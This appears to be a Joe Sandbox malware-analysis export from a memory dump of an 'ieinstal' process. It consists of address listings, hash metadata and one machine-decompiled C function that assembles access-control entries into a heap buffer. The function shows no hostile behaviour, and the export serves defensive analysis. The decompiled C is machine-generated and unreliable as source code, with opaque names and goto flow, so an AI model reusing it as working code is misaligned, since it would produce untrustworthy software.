0x1f069f44
0x1f069f47
0x1f069f4a
0x1f069f4d
0x1f069f4f
0x1f069f4f
0x1f069f54
0x1f069f54
0x1f069f66
0x1f069f6c
0x1f069f91
0x1f069f91
0x1f069f93
0x00000000
0x00000000
0x1f069f99
0x1f069f9c
0x1f069f9e
0x1f069fab
0x1f069fad
0x1f069fb5
0x1f069fb7
0x1f069fba
0x1f069fc1
0x1f069fc2
0x1f069fc6
0x1f069fcc
0x1f069fd6
0x1f069fd6
0x1f069fce
0x1f069fce
0x1f069fce
0x1f069fd8
0x1f069fda
0x1f06a004
0x1f06a00d
0x1f06a010
0x1f06a012
0x1f06a2f5
0x1f06a2f7
0x1f06a2fb
0x1f06a30c
0x1f06a2fd
0x1f06a2fd
0x1f06a2ff
0x1f06a302
0x1f06a304
0x1f06a304
0x1f06a304
0x1f06a307
0x1f06a307
0x1f06a319
0x1f06a31f
0x1f06a324
0x1f06a328
0x1f06a32c
0x00000000
0x1f06a32c
0x1f06a018
0x1f06a01b
0x1f06a01d
0x1f06a02a
0x1f06a02c
0x1f06a034
0x1f06a036
0x1f06a039
0x1f06a03b
0x1f06a03e
0x1f06a041
0x1f06a1eb
0x1f06a1ef
0x1f06a200
0x1f06a1f1
0x1f06a1f1
0x1f06a1f3
0x1f06a1f6
0x1f06a1f8
0x1f06a1f8
0x1f06a1f8
0x1f06a1fb
0x1f06a1fb
0x1f06a20b
0x1f06a20f
0x1f06a214
0x1f06a217
0x1f06a21b
0x1f06a21f
0x1f06a234
0x1f06a221
0x1f06a221
0x1f06a223
0x1f06a226
0x1f06a228
0x1f06a228
0x1f06a228
0x1f06a22b
0x1f06a22e
0x1f06a22e
0x1f06a237
0x1f06a23a
0x1f06a23d
0x1f06a23f
0x1f06a241
0x1f06a241
0x1f06a244
0x1f06a247
0x1f06a247
0x1f06a24b
0x1f06a260
0x1f06a263
0x1f06a24d
0x1f06a24d
0x1f06a24f
0x1f06a252
0x1f06a254
0x1f06a254
0x1f06a254
0x1f06a257
0x1f06a25b
0x1f06a25b
0x1f06a266
0x1f06a268
0x1f06a2a7
0x1f06a2ad
0x1f06a2b0
0x1f06a2b7
0x1f06a2bd
0x1f06a2b9
0x1f06a2b9
0x1f06a2b9
0x1f06a2c1
0x1f06a26a
0x1f06a26e
0x1f06a276
0x1f06a27c
0x1f06a280
0x1f06a287
0x1f06a28e
0x1f06a294
0x1f06a290
0x1f06a290
0x1f06a290
0x1f06a298
0x1f06a29c
0x1f06a2a1
0x1f06a2a1
0x1f06a2c5
0x1f06a2c9
0x1f06a2de
0x1f06a2e1
0x1f06a2cb
0x1f06a2cb
0x1f06a2cd
0x1f06a2d0
0x1f06a2d2
0x1f06a2d2
0x1f06a2d2
0x1f06a2d5
0x1f06a2d9
0x1f06a2d9
0x1f06a2ec
0x00000000
0x1f06a2ec
0x1f06a047
0x1f06a04a
0x1f06a1d1
0x1f06a1d6
0x1f06a1db
0x1f06a1df
0x1f06a1e2
0x00000000
0x1f06a1e2
0x1f06a050
0x1f06a053
0x1f06a07c
0x1f06a07f
0x1f06a081
0x1f06a097
0x1f06a083
0x1f06a083
0x1f06a085
0x1f06a088
0x1f06a08a
0x1f06a08c
0x1f06a08c
0x1f06a08c
0x1f06a08f
0x1f06a092
0x1f06a092
0x1f06a09a
0x1f06a09d
0x1f06a0a0
0x1f06a0ae
0x1f06a0b1
0x1f06a0c4
0x1f06a0c6
0x1f06a0d0
0x1f06a0d2
0x1f06a0fb
0x1f06a0fd
0x1f06a10e
0x1f06a0ff
0x1f06a0ff
0x1f06a101
0x1f06a104
0x1f06a106
0x1f06a106
0x1f06a106
0x1f06a109
0x1f06a109
0x1f06a0d4
0x1f06a0e1
0x1f06a0e3
0x1f06a0e6
0x1f06a0f1
0x1f06a0f1
0x1f06a0f3
0x1f06a0e8
0x1f06a0e8
0x1f06a0e8
0x1f06a0f5
0x1f06a0f5
0x1f06a117
0x1f06a0c8
0x1f06a0cb
0x1f06a0cb
0x1f06a0b3
0x1f06a0b9
0x1f06a0b9
0x1f06a0a2
0x1f06a0aa
0x1f06a0aa
0x1f06a126
0x1f06a12c
0x1f06a132
0x1f06a136
0x1f06a139
0x1f06a13c
0x1f06a14a
0x1f06a14d
0x1f06a160
0x1f06a162
0x1f06a16c
0x1f06a16e
0x1f06a197
0x1f06a19b
0x1f06a1ac
0x1f06a19d
0x1f06a19d
0x1f06a19f
0x1f06a1a2
0x1f06a1a4
0x1f06a1a4
0x1f06a1a4
0x1f06a1a7
0x1f06a1a7
0x1f06a170
0x1f06a17d
0x1f06a17f
0x1f06a182
0x1f06a18d
0x1f06a18d
0x1f06a18f
0x1f06a184
0x1f06a184
0x1f06a184
0x1f06a191
0x1f06a191
0x1f06a1b5
0x1f06a164
0x1f06a167
0x1f06a167
0x1f06a14f
0x1f06a155
0x1f06a155
0x1f06a13e
0x1f06a146
0x1f06a146
0x1f06a1b9
0x1f06a1bf
0x1f06a1c0
0x1f06a1c3
0x1f06a1c5
0x1f06a1c7
0x1f06a1c7
0x1f06a1ca
0x00000000
0x1f06a1ca
0x1f06a058
0x00000000
0x1f06a058
0x1f06a02e
0x1f06a025
0x1f06a025
0x00000000
0x1f06a025
0x1f06a022
0x1f06a022
0x00000000
0x1f069fdc
0x1f069fe1
0x1f069fe6
0x1f069fe8
0x1f06a003
0x00000000
0x1f06a003
0x1f069fef
0x1f069ff3
0x00000000
0x00000000
0x1f069ff9
0x1f069ffb
0x1f069da6
0x1f069da6
0x1f069dac
0x1f069db6
0x1f069db6
0x1f069dae
0x1f069dae
0x1f069dae
0x1f069db8
0x1f069dba
0x1f069dd9
0x1f069dd9
0x1f069ddd
0x1f069ddf
0x1f069e5a
0x1f069e5d
0x1f069e61
0x1f069e72
0x1f069e63
0x1f069e63
0x1f069e65
0x1f069e68
0x1f069e6a
0x1f069e6a
0x1f069e6a
0x1f069e6d
0x1f069e6d
0x1f069e75
0x1f069e78
0x1f069e7a
0x1f069e94
0x1f069e7c
0x1f069e8c
0x1f069e8c
0x1f069e96
0x1f069e98
0x1f06a335
0x1f06a335
0x00000000
0x1f069e9e
0x1f069e9e
0x1f069ea2
0x1f069f8b
0x1f069f8e
0x1f069f8e
0x00000000
0x1f069f8e
0x1f069ea8
0x1f069eb0
0x1f069eb3
0x1f069f74
0x1f069f79
0x1f069f7d
0x1f069f7f
0x1f069f82
0x00000000
0x1f069f82
0x1f069eb9
0x1f069ec2
0x1f069ec4
0x1f069ece
0x1f069ed0
0x1f069ed1
0x1f069ed1
0x1f069ed1
0x00000000
0x1f069ed1
0x1f069ec8
0x1f069ecb
0x00000000
0x1f069ecb
0x1f069e98
0x1f069de1
0x1f069de4
0x1f069de8
0x1f069df1
0x1f069df1
0x1f069df1
0x1f069df6
0x1f069df9
0x1f069e09
0x1f069e0c
0x1f069e0e
0x1f069e2b
0x1f069e10
0x1f069e1e
0x1f069e20
0x1f069e23
0x1f069e23
0x1f069e2d
0x1f069e2f
0x00000000
0x1f069e35
0x1f069e35
0x1f069e38
0x00000000
0x00000000
0x1f069e3a
0x1f069e3e
0x1f069e4f
0x1f069e40
0x1f069e40
0x1f069e42
0x1f069e45
0x1f069e47
0x1f069e47
0x1f069e47
0x1f069e4a
0x1f069e4a
0x1f069e52
0x00000000
0x1f069e52
0x1f069dfb
0x1f069dfb
0x1f069dfe
0x1f069ee1
0x1f069ee1
0x1f069ee3
0x1f06a05e
0x00000000
0x1f06a05e
0x1f069ee9
0x00000000
0x1f069ee9
0x1f069dbc
0x1f069dc1
0x1f069dc6
0x1f069dc8
0x00000000
0x00000000
0x1f069dcf
0x1f069dd3
0x00000000
0x00000000
0x00000000
0x1f069dd3
0x1f069dba
0x1f069fda
0x1f069faf
0x1f069fa6
0x1f069fa6
0x00000000
0x1f069fa6
0x1f069fa3
0x1f069fa3
0x00000000
0x1f069fa3
0x1f069f05
0x1f069ed9
0x1f069edf
0x00000000
0x1f069edf
0x1f069cdd
0x1f069cdf
0x1f069ce4
0x1f069ce6
0x00000000
0x1f069ce8
0x1f069ce8
0x1f06a33c
0x1f06a33c
0x1f06a341
0x1f06a343
0x1f06a355
0x1f06a345
0x1f06a34e
0x1f06a34e
0x1f06a35a
0x1f06a35d
0x1f06a35f
0x1f06a365
0x1f06a36c
0x1f06a36e
0x1f06a375
0x1f06a379
0x1f06a379
0x1f06a375
0x1f06a36c
0x00000000
0x1f06a37e
0x1f069ce6

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5633f4850aaa69891d016576fd451a969d2256596ec5a1a1eef7cdce3b97ea21
Instruction ID: bc44ff9f95dfb3d8ebcf8c63225b859c331f6c957b119aaa9dd3912e7314170c
Opcode Fuzzy Hash: 5633f4850aaa69891d016576fd451a969d2256596ec5a1a1eef7cdce3b97ea21
Instruction Fuzzy Hash: 0122E3706046A28FD714DF3AC0903F6B7E1AF45324F14895AE8878F686E739F592DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFE8CDF Relevance: .6, Instructions: 554
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1EFE8CDF(signed int __ecx, signed char* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20, signed int* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				signed char* _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				intOrPtr _t227;
				signed int _t230;
				signed int _t235;
				signed int _t240;
				signed short _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed short _t247;
				signed int _t249;
				signed short _t252;
				signed int _t254;
				signed short _t258;
				signed short _t264;
				intOrPtr _t268;
				signed short _t269;
				signed int _t280;
				signed int _t286;
				signed int _t292;
				signed int _t298;
				signed int _t304;
				intOrPtr _t305;
				signed int _t307;
				signed int _t312;
				signed char* _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed char* _t330;
				signed char* _t331;
				signed char* _t332;
				signed char* _t333;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed short _t341;
				signed int _t342;
				intOrPtr _t344;
				signed short _t345;
				signed short _t346;
				signed short _t347;
				signed int _t348;
				signed short _t349;
				signed short _t350;
				signed char* _t359;
				signed char* _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				intOrPtr _t378;
				signed int _t381;
				char* _t382;
				char* _t383;
				char* _t384;
				char* _t385;
				char* _t386;
				intOrPtr* _t387;
				signed int* _t388;
				signed int _t389;
				void* _t390;

				_t218 = __ecx;
				_v12 = 2;
				_t381 = 0;
				_v20 = __ecx;
				_v40 = 0;
				_t316 = __edx;
				_v24 = __edx;
				_v16 = 0;
				_v36 = 0;
				if(__ecx != 0 || __edx != 0 || _a4 != 0 || _a8 != 0 || _a12 != 0 || _a16 != 0) {
					_t388 = _a24;
					_v8 = 8;
					__eflags = _t218;
					if(_t218 != 0) {
						_t363 = _t381;
						_t329 = _t218 + 8;
						_t381 = 0;
						_v28 = _t363;
						_v32 = _t329;
						__eflags = 0 -  *((intOrPtr*)(_t218 + 4));
						if(0 >=  *((intOrPtr*)(_t218 + 4))) {
							goto L9;
						}
						do {
							_t305 =  *_t329;
							__eflags = _t305 - 2;
							if(_t305 < 2) {
								goto L75;
							}
							__eflags = _t305 - 3;
							if(_t305 <= 3) {
								L70:
								_t321 = E1EFB94A3(_v8,  *(_t329 + 2) & 0x0000ffff,  &_v8);
								__eflags = _t321;
								if(_t321 < 0) {
									L39:
									 *_a20 = _v16;
									return _t321;
								}
								__eflags = _t388;
								if(_t388 != 0) {
									 *_t388 =  *_t388 | 0x00000008;
									__eflags =  *_t388;
								}
								_t329 = _v32;
								_t363 = _v28;
								_t312 =  *_v20 & 0x000000ff;
								__eflags = _t312 - _v12;
								if(_t312 > _v12) {
									_v12 = _t312;
								}
								goto L75;
							}
							__eflags = _t305 - 6;
							if(_t305 <= 6) {
								goto L75;
							}
							__eflags = _t305 - 8;
							if(_t305 <= 8) {
								goto L70;
							}
							__eflags = _t305 - 0xd - 3;
							if(_t305 - 0xd > 3) {
								goto L75;
							}
							goto L70;
							L75:
							_t363 = _t363 + 1;
							_t329 = _t329 + ( *(_t329 + 2) & 0x0000ffff);
							_v28 = _t363;
							_t307 = _v20;
							_v32 = _t329;
							__eflags = _t363 - ( *(_t307 + 4) & 0x0000ffff);
						} while (_t363 < ( *(_t307 + 4) & 0x0000ffff));
						_t316 = _v24;
					}
					L9:
					__eflags = _t316;
					if(_t316 == 0) {
						L18:
						_t219 = _a12;
						__eflags = _t219;
						if(_t219 != 0) {
							_t330 = _t219 + 8;
							__eflags = 0 -  *((intOrPtr*)(_t219 + 4));
							_t364 = _t381;
							while(1) {
								_v28 = _t330;
								_v32 = _t364;
								if(__eflags >= 0) {
									goto L19;
								}
								__eflags =  *_t330 - 0x14;
								if( *_t330 != 0x14) {
									L84:
									_t364 = _t364 + 1;
									_t330 = _t330 + ( *(_t330 + 2) & 0x0000ffff);
									__eflags = _t364 - ( *(_a12 + 4) & 0x0000ffff);
									continue;
								} else {
									_t321 = E1EFB94A3(_v8,  *(_t330 + 2) & 0x0000ffff,  &_v8);
									__eflags = _t321;
									if(_t321 < 0) {
										goto L39;
									}
									__eflags = _t388;
									if(_t388 != 0) {
										 *_t388 =  *_t388 | 0x00000080;
										__eflags =  *_t388;
									}
									_t364 = _v32;
									_t298 =  *_a12 & 0x000000ff;
									_t330 = _v28;
									__eflags = _t298 - _v12;
									if(_t298 > _v12) {
										_v12 = _t298;
									}
									goto L84;
								}
								L45:
								_t331 = _t220 + 8;
								__eflags = 0 -  *((intOrPtr*)(_t220 + 4));
								_t365 = _t381;
								while(1) {
									_v28 = _t331;
									_v32 = _t365;
									if(__eflags >= 0) {
										break;
									}
									__eflags =  *_t331 - 0x15;
									if( *_t331 != 0x15) {
										L91:
										_t365 = _t365 + 1;
										_t331 = _t331 + ( *(_t331 + 2) & 0x0000ffff);
										__eflags = _t365 - ( *(_a16 + 4) & 0x0000ffff);
										continue;
									} else {
										_t321 = E1EFB94A3(_v8,  *(_t331 + 2) & 0x0000ffff,  &_v8);
										__eflags = _t321;
										if(_t321 < 0) {
											goto L39;
										}
										__eflags = _t388;
										if(_t388 != 0) {
											 *_t388 =  *_t388 | 0x00000100;
											__eflags =  *_t388;
										}
										_t365 = _v32;
										_t292 =  *_a16 & 0x000000ff;
										_t331 = _v28;
										__eflags = _t292 - _v12;
										if(_t292 > _v12) {
											_v12 = _t292;
										}
										goto L91;
									}
									L48:
									_t78 = _t221 + 8; // 0xa
									_t332 = _t78;
									__eflags = 0 -  *((intOrPtr*)(_t221 + 4));
									_t366 = _t381;
									while(1) {
										_v28 = _t332;
										_v32 = _t366;
										if(__eflags >= 0) {
											break;
										}
										__eflags =  *_t332 - 0x12;
										if( *_t332 != 0x12) {
											L98:
											_t366 = _t366 + 1;
											_t332 = _t332 + ( *(_t332 + 2) & 0x0000ffff);
											__eflags = _t366 - ( *(_a4 + 4) & 0x0000ffff);
											continue;
										} else {
											_t321 = E1EFB94A3(_v8,  *(_t332 + 2) & 0x0000ffff,  &_v8);
											__eflags = _t321;
											if(_t321 < 0) {
												goto L39;
											}
											__eflags = _t388;
											if(_t388 != 0) {
												 *_t388 =  *_t388 | 0x00000020;
												__eflags =  *_t388;
											}
											_t366 = _v32;
											_t286 =  *_a4 & 0x000000ff;
											_t332 = _v28;
											__eflags = _t286 - _v12;
											if(_t286 > _v12) {
												_v12 = _t286;
											}
											goto L98;
										}
										L51:
										_t333 = _t222 + 8;
										__eflags = 0 -  *((intOrPtr*)(_t222 + 4));
										_t367 = _t381;
										while(1) {
											_v28 = _t333;
											_v32 = _t367;
											if(__eflags >= 0) {
												break;
											}
											__eflags =  *_t333 - 0x13;
											if( *_t333 != 0x13) {
												L105:
												_t367 = _t367 + 1;
												_t333 = _t333 + ( *(_t333 + 2) & 0x0000ffff);
												__eflags = _t367 - ( *(_a8 + 4) & 0x0000ffff);
												continue;
											} else {
												_t321 = E1EFB94A3(_v8,  *(_t333 + 2) & 0x0000ffff,  &_v8);
												__eflags = _t321;
												if(_t321 < 0) {
													goto L39;
												}
												__eflags = _t388;
												if(_t388 != 0) {
													 *_t388 =  *_t388 | 0x00000040;
													__eflags =  *_t388;
												}
												_t367 = _v32;
												_t280 =  *_a8 & 0x000000ff;
												_t333 = _v28;
												__eflags = _t280 - _v12;
												if(_t280 > _v12) {
													_v12 = _t280;
												}
												goto L105;
											}
											L54:
											_t338 = _t381;
											_v28 = _t369 + 8;
											_v32 = _t338;
											__eflags = 0 -  *(_t369 + 4);
											if(0 >=  *(_t369 + 4)) {
												L27:
												_t389 = _v36;
												L28:
												_t370 = _v24;
												__eflags = _t370;
												if(_t370 == 0) {
													L35:
													_t371 = _a12;
													__eflags = _t371;
													if(_t371 != 0) {
														_t339 = _t381;
														_v32 = _t371 + 8;
														_v36 = _t339;
														__eflags = 0 -  *(_t371 + 4);
														if(0 >=  *(_t371 + 4)) {
															goto L36;
														}
														_t385 = _v32;
														_t325 = _v16;
														do {
															__eflags =  *_t385 - 0x14;
															_t258 =  *(_t385 + 2) & 0x0000ffff;
															if( *_t385 == 0x14) {
																E1F0088C0(_t389, _t385, _t258);
																_t371 = _a12;
																_t390 = _t390 + 0xc;
																 *((short*)(_t325 + 4)) =  *((short*)(_t325 + 4)) + 1;
																_t347 =  *(_t385 + 2) & 0x0000ffff;
																_t389 = _t389 + _t347;
																__eflags = _t389;
																_t258 = _t347;
																_t339 = _v36;
															}
															_t339 = _t339 + 1;
															_t385 = _t385 + (_t258 & 0x0000ffff);
															_v36 = _t339;
															__eflags = _t339 - ( *(_t371 + 4) & 0x0000ffff);
														} while (_t339 < ( *(_t371 + 4) & 0x0000ffff));
														_t321 = _v12;
														_t381 = 0;
													}
													L36:
													_t240 = _a16;
													__eflags = _t240;
													if(_t240 != 0) {
														_t340 = _t381;
														_t382 = _t240 + 8;
														_v36 = _t340;
														__eflags = 0 -  *((intOrPtr*)(_t240 + 4));
														if(0 <  *((intOrPtr*)(_t240 + 4))) {
															_t322 = _v16;
															do {
																__eflags =  *_t382 - 0x15;
																_t241 =  *(_t382 + 2) & 0x0000ffff;
																if( *_t382 == 0x15) {
																	E1F0088C0(_t389, _t382, _t241);
																	_t390 = _t390 + 0xc;
																	 *((short*)(_t322 + 4)) =  *((short*)(_t322 + 4)) + 1;
																	_t341 =  *(_t382 + 2) & 0x0000ffff;
																	_t389 = _t389 + _t341;
																	__eflags = _t389;
																	_t241 = _t341;
																	_t340 = _v36;
																}
																_t340 = _t340 + 1;
																_t382 = _t382 + (_t241 & 0x0000ffff);
																_v36 = _t340;
																_t243 = _a16;
																__eflags = _t340 - ( *(_t243 + 4) & 0x0000ffff);
															} while (_t340 < ( *(_t243 + 4) & 0x0000ffff));
															_t321 = _v12;
														}
														_t381 = 0;
													}
													_t245 = _a4;
													__eflags = _t245;
													if(_t245 != 0) {
														_t342 = _t381;
														_t97 = _t245 + 8; // 0xa
														_t383 = _t97;
														_v36 = _t342;
														__eflags = 0 -  *((intOrPtr*)(_t245 + 4));
														if(0 >=  *((intOrPtr*)(_t245 + 4))) {
															goto L38;
														}
														_t324 = _v16;
														do {
															__eflags =  *_t383 - 0x12;
															_t252 =  *(_t383 + 2) & 0x0000ffff;
															if( *_t383 == 0x12) {
																E1F0088C0(_t389, _t383, _t252);
																_t390 = _t390 + 0xc;
																 *((short*)(_t324 + 4)) =  *((short*)(_t324 + 4)) + 1;
																_t346 =  *(_t383 + 2) & 0x0000ffff;
																_t389 = _t389 + _t346;
																__eflags = _t389;
																_t252 = _t346;
																_t342 = _v36;
															}
															_t342 = _t342 + 1;
															_t383 = _t383 + (_t252 & 0x0000ffff);
															_v36 = _t342;
															_t254 = _a4;
															__eflags = _t342 - ( *(_t254 + 4) & 0x0000ffff);
														} while (_t342 < ( *(_t254 + 4) & 0x0000ffff));
														_t321 = _v12;
													}
													L38:
													_t246 = _a8;
													__eflags = _t246;
													if(_t246 != 0) {
														_t384 = _t246 + 8;
														__eflags = 0 -  *((intOrPtr*)(_t246 + 4));
														if(0 >=  *((intOrPtr*)(_t246 + 4))) {
															goto L39;
														}
														_t323 = _v16;
														_t344 = 0;
														__eflags = 0;
														do {
															__eflags =  *_t384 - 0x13;
															_t247 =  *(_t384 + 2) & 0x0000ffff;
															if( *_t384 == 0x13) {
																E1F0088C0(_t389, _t384, _t247);
																_t390 = _t390 + 0xc;
																 *((short*)(_t323 + 4)) =  *((short*)(_t323 + 4)) + 1;
																_t345 =  *(_t384 + 2) & 0x0000ffff;
																_t389 = _t389 + _t345;
																__eflags = _t389;
																_t247 = _t345;
																_t344 = _v40;
															}
															_t344 = _t344 + 1;
															_t384 = _t384 + (_t247 & 0x0000ffff);
															_v40 = _t344;
															_t249 = _a8;
															__eflags = _t344 - ( *(_t249 + 4) & 0x0000ffff);
														} while (_t344 < ( *(_t249 + 4) & 0x0000ffff));
														_t321 = _v12;
													}
													goto L39;
												}
												_t348 = _t381;
												_v32 = _t370 + 8;
												_v36 = _t348;
												__eflags = 0 -  *(_t370 + 4);
												if(0 >=  *(_t370 + 4)) {
													goto L35;
												}
												_t386 = _v32;
												_t326 = _v16;
												do {
													__eflags =  *_t386 - 0x11;
													_t264 =  *(_t386 + 2) & 0x0000ffff;
													if( *_t386 == 0x11) {
														E1F0088C0(_t389, _t386, _t264);
														_t370 = _v24;
														_t390 = _t390 + 0xc;
														 *((short*)(_t326 + 4)) =  *((short*)(_t326 + 4)) + 1;
														_t349 =  *(_t386 + 2) & 0x0000ffff;
														_t389 = _t389 + _t349;
														__eflags = _t389;
														_t264 = _t349;
														_t348 = _v36;
													}
													_t348 = _t348 + 1;
													_t386 = _t386 + (_t264 & 0x0000ffff);
													_v36 = _t348;
													__eflags = _t348 - ( *(_t370 + 4) & 0x0000ffff);
												} while (_t348 < ( *(_t370 + 4) & 0x0000ffff));
												_t321 = _v12;
												_t381 = 0;
												__eflags = 0;
												goto L35;
											}
											_t389 = _v36;
											_t387 = _v28;
											_t327 = _v16;
											do {
												_t268 =  *_t387;
												__eflags = _t268 - 2;
												if(_t268 < 2) {
													L116:
													_t269 =  *(_t387 + 2) & 0x0000ffff;
													goto L117;
												}
												__eflags = _t268 - 3;
												if(_t268 <= 3) {
													L115:
													E1F0088C0(_t389, _t387,  *(_t387 + 2) & 0x0000ffff);
													_t369 = _v20;
													_t390 = _t390 + 0xc;
													 *((short*)(_t327 + 4)) =  *((short*)(_t327 + 4)) + 1;
													_t350 =  *(_t387 + 2) & 0x0000ffff;
													_t389 = _t389 + _t350;
													_t269 = _t350;
													_t338 = _v32;
													goto L117;
												}
												__eflags = _t268 - 6;
												if(_t268 <= 6) {
													goto L116;
												}
												__eflags = _t268 - 8;
												if(_t268 <= 8) {
													goto L115;
												}
												__eflags = _t268 - 0xd - 3;
												if(_t268 - 0xd > 3) {
													goto L116;
												}
												goto L115;
												L117:
												_t338 = _t338 + 1;
												_t387 = _t387 + (_t269 & 0x0000ffff);
												_v32 = _t338;
												__eflags = _t338 - ( *(_t369 + 4) & 0x0000ffff);
											} while (_t338 < ( *(_t369 + 4) & 0x0000ffff));
											_t321 = _v12;
											_t381 = 0;
											goto L28;
										}
										L22:
										_push( &_v8);
										_t368 = 3;
										_t321 = E1EFB94A3(_v8, _t368);
										__eflags = _t321;
										if(_t321 < 0) {
											goto L39;
										}
										_t227 =  *0x1f0b5d78; // 0x0
										_t337 = _v8 & 0xfffffffc;
										_v8 = _v8 & 0xfffffffc;
										_t230 = E1EFD5D90(_v8 & 0xfffffffc,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t227 + 0x140000, _t337);
										_v16 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											_t321 = 0xc0000017;
											goto L39;
										}
										_t321 = E1EFE7C20(_t230, _v8, _v12);
										_v12 = _t321;
										__eflags = _t321;
										if(_t321 < 0) {
											L108:
											E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t381, _v16);
											_v16 = _t381;
											goto L39;
										}
										_t235 = E1EFE7F70(_t337, _v16,  &_v36);
										__eflags = _t235;
										if(_t235 == 0) {
											_t321 = 0xc000007d;
											goto L108;
										}
										_t369 = _v20;
										__eflags = _t369;
										if(_t369 != 0) {
											goto L54;
										}
										goto L27;
									}
									L21:
									_t222 = _a8;
									__eflags = _t222;
									if(_t222 != 0) {
										goto L51;
									}
									goto L22;
								}
								L20:
								_t221 = _a4;
								__eflags = _t221;
								if(_t221 != 0) {
									goto L48;
								}
								goto L21;
							}
						}
						L19:
						_t220 = _a16;
						__eflags = _t220;
						if(_t220 != 0) {
							goto L45;
						}
						goto L20;
					}
					_t14 =  &(_t316[8]); // 0x8
					_t359 = _t14;
					__eflags = 0 - _t316[4];
					_t378 = _t381;
					while(1) {
						_v28 = _t359;
						_v32 = _t378;
						if(__eflags >= 0) {
							goto L18;
						}
						__eflags =  *_t359 - 0x11;
						if( *_t359 != 0x11) {
							L17:
							_t378 = _t378 + 1;
							_t359 =  &(_t359[_t359[2] & 0x0000ffff]);
							__eflags = _t378 - (_t316[4] & 0x0000ffff);
							continue;
						}
						_t321 = E1EFB94A3(_v8, _t359[2] & 0x0000ffff,  &_v8);
						__eflags = _t321;
						if(_t321 < 0) {
							goto L39;
						}
						__eflags = _t388;
						if(_t388 != 0) {
							 *_t388 =  *_t388 | 0x00000010;
							__eflags =  *_t388;
						}
						_t316 = _v24;
						_t359 = _v28;
						_t378 = _v32;
						_t304 =  *_t316 & 0x000000ff;
						__eflags = _t304 - _v12;
						if(_t304 > _v12) {
							_v12 = _t304;
						}
						goto L17;
					}
					goto L18;
				} else {
					 *_a20 = 0;
					return 0;
				}
			}

0x1efe8ce9
0x1efe8ceb
0x1efe8cf3
0x1efe8cf5
0x1efe8cf8
0x1efe8cfb
0x1efe8cfd
0x1efe8d00
0x1efe8d03
0x1efe8d08
0x1efe8d30
0x1efe8d33
0x1efe8d3a
0x1efe8d3c
0x1efe8ee8
0x1efe8eea
0x1efe8eed
0x1efe8eef
0x1efe8ef2
0x1efe8ef5
0x1efe8ef9
0x00000000
0x00000000
0x1f02d084
0x1f02d084
0x1f02d086
0x1f02d088
0x00000000
0x00000000
0x1f02d08a
0x1f02d08c
0x1f02d09c
0x1f02d0ac
0x1f02d0ae
0x1f02d0b0
0x1efe8ed9
0x1efe8edf
0x00000000
0x1efe8ee1
0x1f02d0b6
0x1f02d0b8
0x1f02d0ba
0x1f02d0ba
0x1f02d0ba
0x1f02d0c0
0x1f02d0c3
0x1f02d0c6
0x1f02d0c9
0x1f02d0cc
0x1f02d0ce
0x1f02d0ce
0x00000000
0x1f02d0cc
0x1f02d08e
0x1f02d090
0x00000000
0x00000000
0x1f02d092
0x1f02d094
0x00000000
0x00000000
0x1f02d098
0x1f02d09a
0x00000000
0x00000000
0x00000000
0x1f02d0d1
0x1f02d0d5
0x1f02d0d6
0x1f02d0d8
0x1f02d0db
0x1f02d0de
0x1f02d0e5
0x1f02d0e5
0x1f02d0e9
0x1f02d0e9
0x1efe8d42
0x1efe8d42
0x1efe8d44
0x1efe8da3
0x1efe8da3
0x1efe8da6
0x1efe8da8
0x1efe8f06
0x1efe8f09
0x1efe8f0d
0x1efe8f0f
0x1efe8f0f
0x1efe8f12
0x1efe8f15
0x00000000
0x00000000
0x1f02d0f9
0x1f02d0fc
0x1f02d136
0x1f02d13a
0x1f02d13b
0x1f02d144
0x00000000
0x1f02d0fe
0x1f02d10e
0x1f02d110
0x1f02d112
0x00000000
0x00000000
0x1f02d118
0x1f02d11a
0x1f02d11c
0x1f02d11c
0x1f02d11c
0x1f02d125
0x1f02d128
0x1f02d12b
0x1f02d12e
0x1f02d131
0x1f02d133
0x1f02d133
0x00000000
0x1f02d131
0x1efe8f20
0x1efe8f22
0x1efe8f25
0x1efe8f29
0x1efe8f2b
0x1efe8f2b
0x1efe8f2e
0x1efe8f31
0x00000000
0x00000000
0x1f02d14b
0x1f02d14e
0x1f02d188
0x1f02d18c
0x1f02d18d
0x1f02d196
0x00000000
0x1f02d150
0x1f02d160
0x1f02d162
0x1f02d164
0x00000000
0x00000000
0x1f02d16a
0x1f02d16c
0x1f02d16e
0x1f02d16e
0x1f02d16e
0x1f02d177
0x1f02d17a
0x1f02d17d
0x1f02d180
0x1f02d183
0x1f02d185
0x1f02d185
0x00000000
0x1f02d183
0x1efe8f3c
0x1efe8f3e
0x1efe8f3e
0x1efe8f41
0x1efe8f45
0x1efe8f47
0x1efe8f47
0x1efe8f4a
0x1efe8f4d
0x00000000
0x00000000
0x1f02d19d
0x1f02d1a0
0x1f02d1d7
0x1f02d1db
0x1f02d1dc
0x1f02d1e5
0x00000000
0x1f02d1a2
0x1f02d1b2
0x1f02d1b4
0x1f02d1b6
0x00000000
0x00000000
0x1f02d1bc
0x1f02d1be
0x1f02d1c0
0x1f02d1c0
0x1f02d1c0
0x1f02d1c6
0x1f02d1c9
0x1f02d1cc
0x1f02d1cf
0x1f02d1d2
